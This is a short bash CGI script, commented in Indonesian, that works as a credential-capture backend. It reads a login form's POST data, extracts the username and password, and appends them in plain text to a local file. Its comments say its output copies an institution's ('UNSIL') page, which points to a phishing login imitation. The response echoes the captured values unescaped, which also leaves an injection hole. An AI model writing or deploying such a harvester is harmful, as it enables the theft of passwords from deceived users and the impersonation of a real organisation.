#!/usr/bin/env bash

echo "Content-Type: text/html"
echo ""

# Ambil seluruh body POST
DATA=$(cat)

# Tangkap username dan password
USERNAME=$(echo "$DATA" | sed -n 's/.*username=//p' | sed 's/&.*//')
PASSWORD=$(echo "$DATA" | sed -n 's/.*password=//p')

# Format untuk disimpan
GABUNG="USER=$USERNAME PASS=$PASSWORD"

# Simpan ke file
echo "$GABUNG" >> user-password.txt

# Delay sebelum menampilkan halaman
sleep 2.5

# OUTPUT HTML PERSIS SEPERTI HALAMAN UNSIL

cat <<EOF
<!DOCTYPE html>
<html>
<head><meta charset="UTF-8"><title>Data Tersimpan</title></head>
<body>
<h2>Data telah disimpan.</h2>
<p>Username: $USERNAME</p>
<p>Password: $PASSWORD</p>
</body>
</html>
EOF
